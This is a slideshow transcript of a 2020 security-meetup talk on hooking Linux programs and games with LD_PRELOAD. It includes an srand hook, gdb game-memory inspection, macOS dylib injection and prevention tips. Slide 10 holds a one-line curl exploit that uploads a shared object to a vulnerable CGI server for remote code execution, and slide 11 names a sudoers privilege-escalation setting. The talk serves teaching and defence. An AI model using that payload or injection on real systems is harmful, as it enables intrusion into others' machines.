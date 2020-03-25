Successfully reported this slideshow.
Linux (game) hacking with LD_PRELOAD Hackersuli 2020 March
Awesome LD_PRELOAD examples • libkeepalive −enable TCP keepalive socket options • libleakmydata −disable SSL certificate v...
Tux vs Timeskew TIMESKEW="2 1" LD_PRELOAD=./libtimeskew.so supertuxkart TIMESKEW="1 2" LD_PRELOAD=./libtimeskew.so supertu...
Log SSL/TLS • rm -f hooklog.bin • LD_PRELOAD=`pwd`/hook.so.1 wget https://google.com • ./print-hooklog hooklog.bin | head
Random, Debian style #include <stdlib.h> #include <stdio.h> int main() { srand(1); int x = rand(); srand(2); int y = rand(...
LD_PRELOAD explained man ld #define _GNU_SOURCE - This is needed to be able to use RTLD_NEXT, see later #include - no need...
LD_PRELOAD explained man dlsym orig_srand = dlsym(RTLD_NEXT, "srand"); - RTLD_NEXT finds the next occurrence of a function...
Random, Debian style #define _GNU_SOURCE #include <dlfcn.h> #include <stdlib.h> #include <assert.h> void (*orig_srand)(uns...
Compiling and linking gcc -Wall -fPIC -shared -o myldpreload.so ldpreload.c -ldl -Wall – show all warnings -fPIC – all fun...
Hacking vulnerable webserver curl -X POST --data-binary @payload.so http://<IP>/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0...
Can I privesc with LD_PRELOAD on setuid/setgid binaries? No * * except if Defaults env_keep += LD_PRELOAD #in suoders
Ghidra time
Note to self Close everything, Skype, Spotify, Ghidra, ...
Pwnadventure sudo gdb -p $(pidof PwnAdventure3-Linux- Shipping) • p GameWorld • p *GameWorld • p *(ClientWorld *) GameWorld
Pwnadventure Print class definition: − ptype ClientWorld − ptype Player copy to libGameLogic.h p *(Player*)((*(ClientWorld...
Fixing things std::string vs const char* std::string is an object holding the string data const char* is a pointer health:...
Hiding on top of the tree
Frida vs LD_PRELOAD When to use Frida and when to LD_PRELOAD Frida is better for quick one-time hacks LD_PRELOAD is nice w...
Bonus macOS DYLD_INSERT_LIBRARIES is the LD_PRELOAD By default, when System Integrity Protection is enabled and and the pr...
Basic macOS syntax #include <stdio.h> #include <syslog.h> __attribute__((constructor)) static void customConstructor(int a...
Prevent LD_PRELOAD • statically link your program • setuid/setgid set • check for the LD_PRELOAD environment variable, and...
Prevent DYLD_INSERT_LIBRARIES • setuid and/or setgid bits are set • restricted by codes signed with entitlements • restric...
References LiveOverFlow !!!! https://github.com/LiveOverflow/PwnAdventure3/tree/master/tools/linux https://github.com/gaul...
Thank you for your attention
  1. 1. Linux (game) hacking with LD_PRELOAD Hackersuli 2020 March
  2. 2. Awesome LD_PRELOAD examples • libkeepalive −enable TCP keepalive socket options • libleakmydata −disable SSL certificate verification • libfaketime −modifies the system time for a single application
  3. 3. Tux vs Timeskew TIMESKEW="2 1" LD_PRELOAD=./libtimeskew.so supertuxkart TIMESKEW="1 2" LD_PRELOAD=./libtimeskew.so supertux2
  4. 4. Log SSL/TLS • rm -f hooklog.bin • LD_PRELOAD=`pwd`/hook.so.1 wget https://google.com • ./print-hooklog hooklog.bin | head
  5. 5. Random, Debian style #include <stdlib.h> #include <stdio.h> int main() { srand(1); int x = rand(); srand(2); int y = rand(); puts(x == y ? "ok" : "fail"); return !(x == y); }
  6. 6. LD_PRELOAD explained man ld #define _GNU_SOURCE - This is needed to be able to use RTLD_NEXT, see later #include - no need to explain these void (*orig_srand)(unsigned int seed); - we define the original srand here so we can use it later void srand(unsigned int seed) { - override original srand function if(!orig_srand) { - don't depend on a constructor to resolve libc's function, and do it on demand when it's first needed.
  7. 7. LD_PRELOAD explained man dlsym orig_srand = dlsym(RTLD_NEXT, "srand"); - RTLD_NEXT finds the next occurrence of a function in the search order after the current library dlsym - obtain address of a symbol in a shared object or executable assert(orig_srand); - abort program if we don’t have the original srand orig_srand(0); - call original srand with a fixed seed of 0
  8. 8. Random, Debian style #define _GNU_SOURCE #include <dlfcn.h> #include <stdlib.h> #include <assert.h> void (*orig_srand)(unsigned int seed); void srand(unsigned int seed) { if(!orig_srand) { orig_srand = dlsym(RTLD_NEXT, "srand"); assert(orig_srand);} orig_srand(0);}
  9. 9. Compiling and linking gcc -Wall -fPIC -shared -o myldpreload.so ldpreload.c -ldl -Wall – show all warnings -fPIC – all function calls will be made via the Procedure Linkage Table – PLT. Otherwise symbol relocations are internally are resolved at load time, not good. -shared – create a shared library -ldl - tells the linker to find and link libdl.so, this is needed by dlsym
  10. 10. Hacking vulnerable webserver curl -X POST --data-binary @payload.so http://<IP>/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i https://www.elttam.com//blog/goahead/ Because CGI was so secure back in 1999 Especially when the executable uses the LD_PRELOAD variable and accepts it from the GET request
  11. 11. Can I privesc with LD_PRELOAD on setuid/setgid binaries? No * * except if Defaults env_keep += LD_PRELOAD #in suoders
  12. 12. Ghidra time
  13. 13. Note to self Close everything, Skype, Spotify, Ghidra, ...
  14. 14. Pwnadventure sudo gdb -p $(pidof PwnAdventure3-Linux- Shipping) • p GameWorld • p *GameWorld • p *(ClientWorld *) GameWorld
  15. 15. Pwnadventure Print class definition: − ptype ClientWorld − ptype Player copy to libGameLogic.h p *(Player*)((*(ClientWorld*)GameWorld).m_activePlayer.m_object) set variable=value
  16. 16. Fixing things std::string vs const char* std::string is an object holding the string data const char* is a pointer health: public vs protected -std=c++11
  17. 17. Hiding on top of the tree
  18. 18. Frida vs LD_PRELOAD When to use Frida and when to LD_PRELOAD Frida is better for quick one-time hacks LD_PRELOAD is nice when you want to share the love with everyone LD_PRELOAD is better when it is used in production, e.g. a code is fixed
  19. 19. Bonus macOS DYLD_INSERT_LIBRARIES is the LD_PRELOAD By default, when System Integrity Protection is enabled and and the program has the CS_RESTRICT flag (Apple shipped binaries), DYLD_INSERT_LIBRARIES will not work Sad Panda
  20. 20. Basic macOS syntax #include <stdio.h> #include <syslog.h> __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { printf("Hello from dylib!n"); syslog(LOG_ERR, "Dylib injection successful in %sn", argv[0]); } gcc -dynamiclib inject.c -o inject.dylib DYLD_INSERT_LIBRARIES=inject.dylib ./test
  21. 21. Prevent LD_PRELOAD • statically link your program • setuid/setgid set • check for the LD_PRELOAD environment variable, and complain ○ the attacker could also LD_PRELOAD the function that lets you read environment variables… :)
  22. 22. Prevent DYLD_INSERT_LIBRARIES • setuid and/or setgid bits are set • restricted by codes signed with entitlements • restricted segment https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep _dive/
  23. 23. References LiveOverFlow !!!! https://github.com/LiveOverflow/PwnAdventure3/tree/master/tools/linux https://github.com/gaul/awesome-ld-preload https://theevilbit.github.io/posts/dyld_insert_librari es_dylib_injection_in_macos_osx_deep_dive/
  24. 24. Thank you for your attention

